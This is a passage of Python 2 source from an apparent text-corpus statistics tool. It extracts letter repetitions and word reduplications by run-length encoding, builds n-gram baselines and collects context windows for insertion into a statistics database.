temp_baseline_row += self._get_occur(counted_redus,scope=scope,splitted_syntagma=splitted_syntagma)
occur_full_syn_redu = redus_container[2] if redus_container[1] else None
else:
temp_baseline_row += (None,None)
temp_baseline_row += (occur_full_syn_repl, occur_full_syn_redu)
temporized_sum.append(db_helper.values_to_list( temp_baseline_row, "one"))
#self.statsdb._threads_cursors["sum_inserter"].execute(qeary.format(self._temp_baseline_name,placeholders), db_helper.values_to_list( temp_baseline_row, "one") )
if len(temporized_sum) > self._lazyness_border:
self._insert_temporized_sum_into_baseline_table_in_db(temporized_sum,self._temp_baseline_name)
temporized_sum = []
if len(temporized_sum) > 0:
self._insert_temporized_sum_into_baseline_table_in_db(temporized_sum,self._temp_baseline_name)
temporized_sum = []
self.statsdb._threads_cursors["baseline_creater"].execute("DROP TABLE {};".format("baseline") )
self.statsdb._commit(write_all_cash=True)
self.statsdb._threads_cursors["baseline_creater"].execute("ALTER TABLE {} RENAME TO baseline;".format(self._temp_baseline_name) ) # #
self.statsdb._commit(write_all_cash=True)
self.statsdb._update_temp_indexesList_in_instance(thread_name=thread_name)
#self.statsdb._update_database_pragma_list(thread_name=thread_name)
self.statsdb._update_pragma_table_info(thread_name=thread_name)
self.statsdb._update_temp_tablesList_in_instance(thread_name=thread_name)
if self._status_bar:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Syntagmas: Processed:'{}'; Summarized:'{}';".format(status_bar_current.count, counter_summerized) ), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
if counter_summerized > 0:
self.logger.info("All Syntagmas was counted and summerized.")
return counter_summerized
else:
self.logger.info("No one Syntagmas summerized.")
return False
def _set_rle(self, thread_name="Thread0"):
try:
self.logger.debug("INIT-RLE: Start the initialization of Run_length_encoder for '{}'-Thread.".format(thread_name))
self.preprocessors[thread_name]["rle"] = self.mgr.Rle()
#p(type(self.preprocessors[thread_name]["rle"]))
#p(self.preprocessors[thread_name]["rle"])
#p(repr(self.preprocessors[thread_name]["rle"]))
#p(self.preprocessors[thread_name]["rle"].del_rep("ggggklölkrtuiiiggjk"))
#p(self.preprocessors)
self.logger.debug("INIT-RLE: Run_length_encoder for '{}'-Thread was initialized.".format(thread_name))
return True
except Exception as e:
self.logger.error("Exception was encountered: '{}'. ".format(repr(e)), exc_info=self._logger_traceback)
return False
def _init_preprocessors(self, thread_name="Thread0"):
try:
if not self._set_rle(thread_name):
self.logger.error("RLE in '{}'-Thread wasn't initialized. Script will be aborted.".format(thread_name), exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed"})
return False
# if self._status_bar:
# status_bar_preprocessors_init = self._get_new_status_bar(1, "{}:PreprocessorsInit".format(thread_name), "unit")
# if self._set_rle(thread_name):
# if self._status_bar:
# status_bar_preprocessors_init.update(incr=1)
# status_bar_preprocessors_init.refresh()
# else:
# status_bar_preprocessors_init.total -= 1
# self.logger.error("RLE in '{}'-Thread wasn't initialized. Script will be aborted.".format(thread_name), exc_info=self._logger_traceback)
# self.threads_status_bucket.put({"name":thread_name, "status":"failed"})
# return False
# if self._status_bar:
# self.counters_attrs["_init_preprocessors"][thread_name]["start"] = status_bar_preprocessors_init.start
# self.counters_attrs["_init_preprocessors"][thread_name]["end"] = status_bar_preprocessors_init.last_update
# self.counters_attrs["_init_preprocessors"][thread_name]["total"] = status_bar_preprocessors_init.total
# self.counters_attrs["_init_preprocessors"][thread_name]["desc"] = status_bar_preprocessors_init.desc
self.logger.debug("PreprocessorsInit: All Preprocessors for '{}'-Thread was initialized.".format(thread_name))
return True
except Exception as e:
print_exc_plus() if self._ext_tb else ""
self.logger.error("PreprocessorsInitError: See Exception: '{}'. ".format(e), exc_info=self._logger_traceback)
return False
def _compute_cleaning_flags(self):
if not self.force_cleaning_flags:
if not self._corp_info["del_url"]:
if self._ignore_url:
self.force_cleaning_flags.add("URL")
if not self._corp_info["del_hashtag"]:
if self._ignore_hashtag:
self.force_cleaning_flags.add("hashtag")
if not self._corp_info["del_mention"]:
if self._ignore_mention:
self.force_cleaning_flags.add("mention")
if not self._corp_info["del_punkt"]:
if self._ignore_punkt:
self.force_cleaning_flags.add("symbol")
if not self._corp_info["del_num"]:
if self._ignore_num:
self.force_cleaning_flags.add("number")
# = {
# "number":":number:",
# "URL":":URL:",
# "symbol":":symbol:",
# "mention":":mention:",
# "hashtag":":hashtag:",
# }
def _preprocess(self, text_elem,thread_name="Thread0"):
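# Applies the force-cleaning flags to a text element: a token whose category is
# flagged is replaced by (None, placeholder tag); the remaining tokens are
# lowercased when the instance is case-insensitive. The per-sentence sentiment
# value is kept unchanged.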
#p(text_elem, "text_elem", c="r")
#time.sleep(3)
#p(text_elem, "text_elem")
new_text_elem = []
for sent_container in text_elem:
#p(sent_container, "sent_container")
sent = sent_container[0]
#p(sent, "sent")
sentiment = sent_container[1]
#categories = get_categories([token[0] for token in sent])
#p(categories, "categories")
temp_sent = []
#i = -1
for token_container in sent:
#p(token_container, "token_container")
#i+=1
categorie = token_container[1]
if categorie in self.force_cleaning_flags:
if self._log_ignored:
self.logger.outsorted_stats("Following Token was ignored: '{}'. Reason: 'It is an URL'.".format(token_container))
#indexes_to_del.append((index_level_1, index_level_2, index_level_3))
temp_sent.append((None,self._cleaned_tags[categorie]))
continue
#p(token_container)
if not self._case_sensitiv:
temp_sent.append((token_container[0].lower(), token_container[1]))
else:
temp_sent.append(token_container)
#p([token_container[0],token_container[1], i])
#p(temp_sent, "temp_sent")
new_text_elem.append((temp_sent, sentiment))
#p((temp_sent), "temp_sent", c="r")
#self.logger.debug("Text-Cleaning for current text_elem is done.")
#p(new_text_elem, "new_text_elem",c="r")
#sys.exit()
return new_text_elem
def extract_reduplications(self,repl_free_text_container,rle_for_repl_in_text_container, thread_name="Thread0"):
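# Extracts token-level reduplications: each repl-free sentence is RLE-encoded at
# token level and repeated-token runs are extracted. The surviving (redu-free)
# token of every run is annotated with a Counter of the word forms that occurred
# in the run, and the original-to-redu-free index mapping is returned as well.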
#self.logger.low_debug("ReduExtraction was started")
extracted_redu_in_text_container = []
redu_free_text_container = []
text_elem_mapping = []
mapping_redu = []
#p(text_elem, "text_elem")
#p(repl_free_text_container, "repl_free_text_container")
sent_index = -1
#total_sent_number = len(repl_free_text_container)
#p(total_sent_number,"total_sent_number")
for sent in repl_free_text_container:
########### SENTENCE LEVEL ##################
sent_index+= 1
#p(sent, "sent")
repl_in_tuples, mapped = self.preprocessors[thread_name]["rle"].encode_to_tuples(sent,mapping=True)
#p(repl_in_tuples, "repl_in_tuples")
extracted_reps, rep_free_sent = self.preprocessors[thread_name]["rle"].rep_extraction_sent(repl_in_tuples,mapped)
#redu_free_index = -1
for rep in extracted_reps:
#redu_free_index += 1
start_index = rep['start_index_in_orig']
length = rep['length']
i_redu_free = rep["index_in_redu_free"]
repl_free_range = repl_free_text_container[sent_index][start_index:start_index+length]
rle_range = rle_for_repl_in_text_container[sent_index][start_index:start_index+length]
addit_info = []
#p((, ))
#p(repl_free_range, "repl_free_range")
#p(rle_range, "rle_range")
addit_info = [r if r else o for o,r in zip(repl_free_range,rle_range)]
#addit_info = [r if (r,o[1]) else o for o,r in zip(orig_range,rle_range)]
#p(addit_info, "addit_info", c="r")
counts = Counter(addit_info)
#p(counts, "counts")
rep_free_sent[i_redu_free] = (rep_free_sent[i_redu_free], dict(counts))
#p((extracted_reps, rep_free_sent), c="r")
#p(rep_free_sent, "rep_free_sent")
extracted_redu_in_text_container.append(extracted_reps)
redu_free_text_container.append(rep_free_sent)
mapping_redu.append(mapped)
#sys.exit()
#self.logger.low_debug("ReduExtraction was finished")
return extracted_redu_in_text_container, redu_free_text_container, mapping_redu
def extract_replications(self, text_elem, thread_name="Thread0"):
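# Per token, letter replications are extracted with the RLE preprocessor
# (rep_extraction_word). The method returns three parallel per-sentence lists:
# the extracted replications, the replication-free tokens (lower-cased unless
# case sensitive; tokens with a POS tag from self.ignored_pos are passed
# through untouched) and the RLE-encoded word forms ("" where nothing was
# extracted). On malformed containers it marks the run as terminated and
# returns False.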
#self.logger.low_debug("ReplExtraction was started")
repl_free_text_container = []
rle_for_repl_in_text_container = []
extracted_repl_in_text_container = []
#p(text_elem)
sent_index = -1
total_sent_number = len(text_elem)
for sent_container in text_elem:
########### SENTENCE LEVEL ##################
repl_free_text_container.append([])
rle_for_repl_in_text_container.append([])
extracted_repl_in_text_container.append([])
sent_index+= 1
#p((type(sent_container),sent_container), "sent_container_in_repl_extr")
try:
sent = sent_container[0]
sentiment = sent_container[1]
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given SentContainer has wrong structure! SentContainer: '{}'; Exception: '{}'.".format(sent_container,e)
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
if not self._case_sensitiv:
sent = [[token_container[0].lower(), token_container[1]] if token_container[0] else token_container for token_container in sent ]
temp_sent = []
token_index = -1
for token_container in sent:
token_index+=1
try:
token = token_container[0]
pos = token_container[1]
#nr_of_token_in_sent = token_index
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given TokenContainer has wrong structure! '{}'.".format(token_container)
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
if pos not in self.ignored_pos:
if token:
repl_in_tuples = self.preprocessors[thread_name]["rle"].encode_to_tuples(token)
extracted_reps, rep_free_word,rle_word = self.preprocessors[thread_name]["rle"].rep_extraction_word(repl_in_tuples, get_rle_as_str=True)
#p((repl_in_tuples,extracted_reps, rep_free_word,rle_word))
else:
#p((pos, token))
rep_free_word = pos
extracted_reps = None
repl_free_text_container[sent_index].append(rep_free_word)
if extracted_reps:
#p((extracted_reps, rep_free_word,rle_word),c="r")
rle_for_repl_in_text_container[sent_index].append(rle_word)
extracted_repl_in_text_container[sent_index].append(extracted_reps)
else:
rle_for_repl_in_text_container[sent_index].append("")
extracted_repl_in_text_container[sent_index].append("")
else:
repl_free_text_container[sent_index].append(token)
rle_for_repl_in_text_container[sent_index].append("")
extracted_repl_in_text_container[sent_index].append("")
#p((sent_index,token_index, repl_free_text_container[sent_index][token_index],rle_for_repl_in_text_container[sent_index][token_index] ,extracted_repl_in_text_container[sent_index][token_index]))
#p(repl_free_text_container, "repl_free_text_container")
#self.logger.low_debug("ReplExtraction was finished")
return extracted_repl_in_text_container, repl_free_text_container, rle_for_repl_in_text_container
def _get_cleaned_redu_free(self, redu_free_text_container):
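# Flattens the reduplication-free container into a plain token list. Entries
# that are (word, counts) tuples (created for collapsed reduplications) are
# unwrapped to the bare word; everything else is appended as-is.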
inp_token_list = []
for sent in redu_free_text_container:
for token in sent:
try:
token[1].values
inp_token_list.append(token[0])
except (IndexError,AttributeError):
inp_token_list.append(token)
return inp_token_list
def compute_baseline(self, redu_free_text_container,extracted_redu_in_text_container):
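# Builds the baseline as all n-grams (as tuples) of length 1 up to
# self.baseline_ngramm_lenght over the cleaned, reduplication-free token list.
# Example sketch: for the tokens ["a", "b", "c"] and a maximal n-gram length
# of 2 the result would be [("a",), ("b",), ("c",), ("a", "b"), ("b", "c")].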
#self.logger.low_debug("Baseline Computation for current text-element was started")
## Step 1: Extract ngramm from redu and repl free text element
inp_token_list = self._get_cleaned_redu_free(redu_free_text_container)
computed_baseline = []
for n in xrange(1,self.baseline_ngramm_lenght+1):
computed_baseline += [tuple(inp_token_list[i:i+n]) for i in xrange(len(inp_token_list)-n+1)]
## Step 2: Add reduplicated unigramms
#self.logger.low_debug("Baseline Computation was finished.")
return computed_baseline
# def baseline_intime_insertion_into_db(self,thread_name="Thread0"):
# temporized_baseline_to_insert = self.temporized_baseline
# self.temporized_baseline = defaultdict(int)
# thread_name = "basinsrt"
# if self.baseline_insrt_process:
# try:
# i = 0
# while True:
# #a = self.baseline_insrt_process.isAlive()
# #p(a, "isalive")
# i += 1
# if not self.baseline_insrt_process.isAlive():
# self.logger.debug("Waiting is finished -> (BaselineInsertion will be start)")
# break
# else:
# if i >= 50:
# self.logger.error("Timeout limit was reached. Probably something goes wrong!!!!")
# self.terminated = True
# sys.exit()
# self.logger.debug("Wait till BaselineInsertion is done.")
# time.sleep(1)
# except AttributeError:
# pass
# #p("5555")
# self.baseline_insrt_process = threading.Thread(target=self.baseline_insert_temporized_data, args=(temporized_baseline_to_insert, thread_name), name=thread_name)
# self.baseline_insrt_process.setDaemon(True)
# self.baseline_insrt_process.start()
# #time.sleep(5)
# def baseline_insert_left_over_data(self,thread_name="Thread0"):
# thread_name = "basinsrt"
# # p("111")
# if self.baseline_insrt_process:
# # p("222")
# i = 0
# try:
# while True:
# i += 1
# #a = self.baseline_insrt_process.isAlive()
# #p(a, "isalive")
# if not self.baseline_insrt_process.isAlive():
# self.logger.debug("Waiting is finished -> (BaselineInsertion will be start)")
# break
# else:
# if i >= 50:
# self.logger.error("Timeout limit was reached. Probably something goes wrong!!!!")
# self.logger.debug("Wait till BaselineInsertion is done.")
# time.sleep(1)
# except AttributeError:
# pass
# #p("5555")
# self.baseline_insert_temporized_data(self.temporized_baseline,thread_name=thread_name)
# def baseline_intime_insertion_into_db(self,thread_name="Thread0"):
# thread_name = "baseline_insrt"
# self.baseline_insert_temporized_data(self.temporized_baseline,thread_name=thread_name)
# self.temporized_baseline= defaultdict(int)
# def baseline_insert_left_over_data(self,thread_name="Thread0"):
# thread_name = "baseline_insrt"
# self.baseline_insert_temporized_data(self.temporized_baseline,thread_name=thread_name)
# self.temporized_baseline= defaultdict(int)
def baseline_lazyinsertion_into_db(self,db_writer,computed_baseline,extracted_redu_in_text_container, baseline_insertion_border=100000,thread_name="Thread0", ):
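# Lazy insertion: the computed baseline is always buffered via
# temporize_baseline(); once the buffer holds more than
# baseline_insertion_border entries the batch is handed over to the
# db_writer for the "baseline" table.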
#l = len(self.temporized_baseline)
#p((l, baseline_insertion_border))
if len(self.temporized_baseline) > baseline_insertion_border:
self.temporize_baseline(computed_baseline, extracted_redu_in_text_container)
#self.baseline_intime_insertion_into_db()
self._send_data_to_dbwriter(db_writer,"baseline", thread_name)
else:
self.temporize_baseline(computed_baseline,extracted_redu_in_text_container)
#self.insert_temporized_baseline_into_db()
def temporize_baseline(self, computed_baseline,extracted_redu_in_text_container):
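# Counts every syntagma of the current text element into the shared
# self.temporized_baseline dict and additionally credits reduplicated
# unigrams with (length - 1) extra occurrences, since one occurrence is
# already contained in the baseline n-grams.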
#self.temporized_baseline = defaultdict(int)
#p(computed_baseline, "computed_baseline")
for syntagma in computed_baseline:
#p(syntagma)
#if "@ronetejaye" in syntagma:
# p(syntagma, "syntagma")
self.temporized_baseline[syntagma] += 1
#if add_also_repeted_redu:
for sent in extracted_redu_in_text_container:
for redu in sent:
if redu:
#p((redu["word"],),"re_wo")
self.temporized_baseline[(redu["word"],)] += redu["length"]-1
#computed_baseline += [(redu["word"],)]*(redu["length"]-1) # -1, because 1 occur of this unigramm is already in the baseline
self.logger.low_debug("BaselineStats for current text-element was temporized.")
def insert_repl_into_db(self,db_writer,doc_elem,text_elem,extracted_repl_in_text_container, repl_free_text_container,rle_for_repl_in_text_container, redu_free_text_container,mapping_redu,stemmed_text_container, thread_name="Thread0"):
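# For every extracted letter replication this assembles one row for the
# "replications" table: document id, indexes in the original and in the
# reduplication-free text, RLE word, POS tag, normalized and stemmed forms,
# polarity, the replicated letter with its length and position, plus the left
# and right context windows. The row is buffered through _repl_inserter().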
#self.logger.low_debug("Insertion of current ReplsIntoDB was started")
sent_index = -1
redufree_len = tuple(len(sent) for sent in redu_free_text_container)
#p((redu_free_text_container,redufree_len, ))
#p(mapping_redu, "mapping_redu")
for sent in extracted_repl_in_text_container:
#p(sent, "sent")
sent_index += 1
token_index = -1
#temp_next_left_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
#p((doc_elem))
for repls_for_current_token in sent:
token_index += 1
if repls_for_current_token:
#p(repls_for_current_token, "repls_for_current_token")
for repl_container in repls_for_current_token:
#p(repl_container, "repl_container")
if repl_container:
try:
#p((sent_index, token_index), c="c")
current_sent_from_map = mapping_redu[sent_index]
next_left_index_in_orig_t_elem = token_index if token_index in current_sent_from_map else nextLowest(current_sent_from_map,token_index)
token_index_in_redu_free = current_sent_from_map.index(next_left_index_in_orig_t_elem)
it_is_redu = self._is_redu(sent_index,token_index_in_redu_free,redu_free_text_container)
input_dict = {
"doc_id": doc_elem[0],
# "doc_id": doc_elem[self._id_field_name],
'redufree_len':redufree_len,
"index_in_corpus": (sent_index,token_index),
"index_in_redufree": (sent_index,token_index_in_redu_free),
"rle_word": rle_for_repl_in_text_container[sent_index][token_index],
"pos":text_elem[sent_index][0][next_left_index_in_orig_t_elem][1] if it_is_redu else text_elem[sent_index][0][token_index][1],
"normalized_word": repl_free_text_container[sent_index][token_index],
"stemmed":stemmed_text_container[sent_index][token_index_in_redu_free],
"polarity":text_elem[sent_index][1],
"repl_letter": repl_container[0],
"repl_length": repl_container[1],
"index_of_repl": repl_container[2],
"in_redu": (sent_index,token_index_in_redu_free) if it_is_redu else None
}
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given ReplContainer has wrong structure! '{}'. ('{}')".format(repl_container, repr(e))
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
#p(((sent_index, token_index),repl_free_text_container[sent_index][token_index], ), "GET KONTEXT FueR DAS WORD")
#input_dict =
self._get_context_left_for_repl(input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,)
#input_dict =
self._get_context_right_for_repl(input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,)
self._repl_inserter(db_writer,input_dict, thread_name=thread_name)
#p(input_dict, "input_dict")
#self.statsdb.lazyinsert("replications", input_dict, thread_name=thread_name)
#self.logger.low_debug("Insertion of current ReplsIntoDB was finished")
def _repl_inserter(self,db_writer, inp_dict, thread_name="Thread0"):
if len(self.temporized_repl[thread_name]) > self._lazyness_border:
self._temporize_repl(inp_dict, thread_name=thread_name)
self._send_data_to_dbwriter(db_writer,"replications",thread_name)
else:
self._temporize_repl(inp_dict, thread_name=thread_name)
def _temporize_repl(self, inp_dict,thread_name="Thread0"):
temp_list = []
for col in self._repls_cols:
temp_list.append(inp_dict.get(col,None))
#temp_list.append()
self.temporized_repl[thread_name].append(db_helper.values_to_list(temp_list, "one"))
def _redu_inserter(self,db_writer, inp_dict, thread_name="Thread0"):
if len(self.temporized_redu[thread_name]) > self._lazyness_border:
self._temporize_redu(inp_dict, thread_name=thread_name)
self._send_data_to_dbwriter(db_writer,"reduplications",thread_name)
else:
self._temporize_redu(inp_dict, thread_name=thread_name)
def _temporize_redu(self, inp_dict,thread_name="Thread0"):
temp_list = []
for col in self._redus_cols:
temp_list.append(inp_dict.get(col,None))
#temp_list.append()
self.temporized_redu[thread_name].append(db_helper.values_to_list(temp_list, "one"))
def insert_redu_into_db(self,db_writer,doc_elem,text_elem,extracted_redu_in_text_container, redu_free_text_container, rle_for_repl_in_text_container, repl_free_text_container, mapping_redu,stemmed_text_container,thread_name="Thread0"):
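# Analogous to insert_repl_into_db(): builds one row per extracted
# reduplication (document id, indexes, POS tag, normalized/stemmed forms,
# original word forms, reduplication length, polarity and both context
# windows) and buffers it through _redu_inserter() for the
# "reduplications" table.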
#self.logger.low_debug("Insertion of current RedusIntoDB was started")
sent_index = -1
#p(extracted_redu_in_text_container, "extracted_redu_in_text_container")
redufree_len = tuple(len(sent) for sent in redu_free_text_container)
for redu_in_sent in extracted_redu_in_text_container:
sent_index += 1
for redu in redu_in_sent:
#p(redu, c="r")
#if redu:
#p(redu_in_sent, "redu_in_sent")
#p(redu_free_text_container, "redu_free_text_container")
try:
rle_word = rle_for_repl_in_text_container[sent_index][redu['start_index_in_orig']]
#p((redu['start_index_in_orig'],rle_for_repl_in_text_container[sent_index][redu['start_index_in_orig']]), "redu['start_index_in_orig']", c="m")
#p(redu_free_text_container[sent_index][redu['index_in_redu_free']], "orig_words")
index_in_redu_free = redu["index_in_redu_free"]
input_dict = {
"doc_id": doc_elem[0],
# "doc_id": doc_elem[self._id_field_name],
'redufree_len':redufree_len,
"index_in_corpus": (sent_index,redu['start_index_in_orig']),
"index_in_redufree": (sent_index,index_in_redu_free),
#"rle_word": rle_word if rle_word else repl_free_text_container[sent_index][redu['start_index_in_orig']],
"pos":text_elem[sent_index][0][redu['start_index_in_orig']][1],
"normalized_word": repl_free_text_container[sent_index][redu['start_index_in_orig']],
"stemmed":stemmed_text_container[sent_index][index_in_redu_free],
'orig_words':redu_free_text_container[sent_index][index_in_redu_free][1],
"redu_length": redu['length'],
"polarity":text_elem[sent_index][1],
#"repl_letter": repl_container[0],
#"index_of_repl": repl_container[2],
}
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given ReduContainer has wrong structure! '{}'. ('{}')".format(redu, e)
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
#sent =
start_index = redu['start_index_in_orig']
#redu_length = redu['length']
#input_dict =
self._get_context_left_for_redu(input_dict, text_elem, mapping_redu, redu_free_text_container,sent_index , redu,stemmed_text_container,)
#input_dict =
self._get_context_right_for_redu(input_dict, text_elem, mapping_redu, redu_free_text_container, sent_index,redu,stemmed_text_container,)
#p("RIGHT STOP ---------------------\n", c="c")
#self.statsdb.lazyinsert("reduplications", input_dict, thread_name=thread_name)
self._redu_inserter(db_writer,input_dict, thread_name=thread_name)
#p(input_dict, "input_dict")
#self.logger.low_debug("Insertion of current RedusIntoDB was finished")
def _get_context_left_for_repl(self, input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,):
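# Fills input_dict with the left context columns contextL1..contextL<n> and
# context_infoL1..context_infoL<n>. For every context position it first looks
# inside the current sentence; if the window crosses the sentence start it
# walks backwards through the previous sentences, and it stores (None, None)
# once the beginning of the text element is reached.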
### context left
#p(token_index_in_redu_free, "1token_index_in_redu_free")
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextL{}".format(context_number)
col_name_info = "context_infoL{}".format(context_number)
#p(token_index_in_redu_free, "2token_index_in_redu_free")
temp_index = token_index_in_redu_free - context_number
## if needed context_item in the current sent
#p((context_number,sent_index,temp_index))
if temp_index >= 0:
temp_next_left_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
try:
#p((redu_free_text_container,sent_index, temp_index), "redu_free_text_container")
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except :
#p(repr(e), "E1")
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
else: ## if needed context_item not in the current sent
#leftover_contextnumber = context_number - token_index # left over times to go to the left
leftover_contextnumber = context_number - token_index_in_redu_free # left over times to go to the left
if not leftover_contextnumber: # sanity check: there must be at least one step left to go
#p("WrongContextNumber. It should be >0", c="r")
raise Exception("WrongContextNumber. It should be >0")
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index - number_of_loops
if temp_sent_index < 0:
item = None
info = None
break
last_sent = redu_free_text_container[temp_sent_index+1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber >= 0:
temp_index = -leftover_contextnumber
temp_next_left_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
current_sent_from_map = mapping_redu[temp_sent_index]
temp_token_index_in_redu_free = current_sent_from_map.index(temp_next_left_index_in_orig_t_elem)
try:
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (
text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
#info = text_elem[temp_sent_index][0][temp_index][1]
except :
#p(e, "E2")
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
break
#text_elem[sent_index][0][token_index][1]
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
def _get_context_right_for_repl(self, input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,):
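# Mirror image of _get_context_left_for_repl(): fills contextR1..contextR<n>
# and context_infoR1..context_infoR<n>, walking forward into the following
# sentences when the window crosses the sentence end.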
#context right
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextR{}".format(context_number)
col_name_info = "context_infoR{}".format(context_number)
#while True:
#temp_index = token_index + context_number
temp_index = token_index_in_redu_free + context_number
## if needed context_item in the current sent
if temp_index < len(redu_free_text_container[sent_index]):
####p((sent_index, temp_index, len(mapping_redu[sent_index])), "temp_next_left_index_in_orig_t_elem")
temp_next_left_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
try:
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except :
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
else: ## if needed context_item not in the current sent
#leftover_contextnumber = context_number - (len(sent) - (token_index+1)) # left over times to go to the left
leftover_contextnumber = context_number - (len(redu_free_text_container[sent_index]) - (token_index_in_redu_free+1)) # left over times to go to the left
if not leftover_contextnumber: # sanity check: there must be at least one step left to go
raise Exception("1. WrongContextNumber. It should be >0")
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index + number_of_loops
if temp_sent_index >= len(redu_free_text_container):
item = None
info = None
break
last_sent = redu_free_text_container[temp_sent_index-1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= 0 :
raise Exception, "2. WrongLeftoverContextNumber. It should be >0"
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber > 0:
temp_index =leftover_contextnumber-1
temp_next_left_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
current_sent_from_map = mapping_redu[temp_sent_index]
temp_token_index_in_redu_free = current_sent_from_map.index(temp_next_left_index_in_orig_t_elem)
try:
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
except :
#p("444")
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
break
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
def _get_context_right_for_redu(self, input_dict, text_elem, mapping_redu, redu_free_text_container, sent_index,redu,stemmed_text_container,):
## context right
#p("---------------------\nRIGHT START", c="c")
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextR{}".format(context_number)
col_name_info = "context_infoR{}".format(context_number)
#while True:
temp_index = redu['index_in_redu_free'] + context_number
#p((context_number,sent_index,temp_index,len(redu_in_sent)), "context_number,sent_index,temp_index,len(redu_in_sent)")
## if needed context_item in the current sent
if temp_index < len(redu_free_text_container[sent_index]):
#item = redu_free_text_container[sent_index][temp_index]
token_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
#p((sent_index,temp_index, token_index_in_orig_t_elem), "sent_index,temp_index, token_index_in_orig_t_elem")
try:
#p("111")
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except:
#p("222")
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
#p((item, info), c="b")
#info = rle_for_repl_in_text_container[sent_index][start_index:start_index+redu['length']]
#info = text_elem[sent_index][0][temp_index][1]
#p((col_name_context,item, info), "item", c="m")
else: ## if needed context_item not in the current sent
leftover_contextnumber = context_number - (len(redu_free_text_container[sent_index]) - (redu['index_in_redu_free']+1)) # left over times to go to the left
if not leftover_contextnumber: # sanity check: there must be at least one step left to go
raise Exception("1. WrongContextNumber. It should be >0")
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index + number_of_loops
if temp_sent_index >= len(redu_free_text_container):
item = None
info = None
#p((item, info), c="b")
break
last_sent = redu_free_text_container[temp_sent_index-1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= 0 :
raise Exception, "2. WrongLeftoverContextNumber. It should be >0"
